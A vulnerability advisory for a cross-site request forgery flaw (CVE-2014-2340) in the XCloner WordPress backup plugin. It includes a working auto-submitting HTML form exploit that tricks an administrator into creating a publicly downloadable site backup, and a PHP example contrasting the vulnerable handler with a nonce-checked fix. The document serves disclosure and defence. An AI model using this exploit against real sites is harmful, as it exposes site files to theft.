Advisory ID: HTB23206
Product: XCloner Wordpress plugin
Vendor: XCloner
Vulnerable Version(s): 3.1.0 and probably prior
Tested Version: 3.1.0
Advisory Publication: March 12, 2014 [without technical details]
Vendor Notification: March 12, 2014
Vendor Patch: March 13, 2014
Public Disclosure: April 2, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2340
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in the XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of the vulnerable website.
Cross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340
The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and thereby create a website backup.
The simple exploit code below creates a new backup containing all website files (no SQL database), which becomes publicly accessible at the http://[host]/administrator/backups/backup.tar URL:
<form action="http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm" method="post" name="main">
<input type="hidden" name="dbbackup" value="1">
<input type="hidden" name="dbbackup_comp" value="">
<input type="hidden" name="bname" value="backup">
<input type="hidden" name="backupComments" value="">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="generate">
<input type="hidden" name="boxchecked" value="0">
<input type="hidden" name="hidemainmenu" value="0">
<input type="hidden" name="" value="">
<input type="submit" name="run" value="run">
</form>
<script>
document.main.submit();
</script>
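The root cause is a POST handler that acts on the task parameter without any proof that the request came from the plugin's own admin page. The example below is written for this advisory (it is not XCloner's source code) and contrasts that pattern with the nonce check WordPress provides for exactly this class of bug; the function names, the nonce action 'xcloner_generate_backup' and the field name '_xcloner_nonce' are hypothetical.

```php
<?php
// Added example, not XCloner's code. Function names, the nonce action and the
// nonce field name are hypothetical; the WordPress API calls are real.

// BEFORE: acts on any POST carrying task=generate. The victim's browser attaches
// the admin session cookies to a form submitted from an attacker's page, so the
// backup is generated without the administrator intending it (CWE-352).
function xcloner_example_handle_vulnerable() {
    if ( isset( $_POST['task'] ) && $_POST['task'] === 'generate' ) {
        $name = isset( $_POST['bname'] ) ? $_POST['bname'] : 'backup';
        xcloner_example_generate_backup( sanitize_file_name( $name ) );
    }
}

// AFTER: re-check the capability and require a nonce bound to this action.
// check_admin_referer() stops execution with an error when the nonce field is
// missing or does not verify, which a cross-site form cannot satisfy because
// the attacker's page has no way to read the victim's nonce value.
function xcloner_example_handle_fixed() {
    if ( ! isset( $_POST['task'] ) || $_POST['task'] !== 'generate' ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // Verifies $_POST['_xcloner_nonce'] against the 'xcloner_generate_backup' action.
    check_admin_referer( 'xcloner_generate_backup', '_xcloner_nonce' );
    $name = isset( $_POST['bname'] )
        ? sanitize_file_name( wp_unslash( $_POST['bname'] ) )
        : 'backup';
    xcloner_example_generate_backup( $name );
}

// The legitimate admin form must emit the matching hidden nonce field; this is
// the one input the attacker's copy of the form (see above) cannot supply.
function xcloner_example_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'plugins.php?page=xcloner_show' ) ) . '">';
    wp_nonce_field( 'xcloner_generate_backup', '_xcloner_nonce' );
    echo '<input type="hidden" name="task" value="generate">';
    echo '<input type="text" name="bname" value="backup">';
    echo '<input type="submit" name="run" value="run">';
    echo '</form>';
}

function xcloner_example_generate_backup( $name ) {
    // Stand-in for the archive creation; the advisory's point is reached only
    // through the checks above in the fixed handler.
}
```

Nonces in WordPress are tied to the user session and to the action string, so a valid nonce for one administrator is useless on an attacker-controlled page.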
-----------------------------------------------------------------------------------------------
Solution:
Update to XCloner 3.1.1
More Information:
http://www.xcloner.com/support/download/?did=9
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - Cross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.
[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as a standalone PHP/Mysql backup application.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.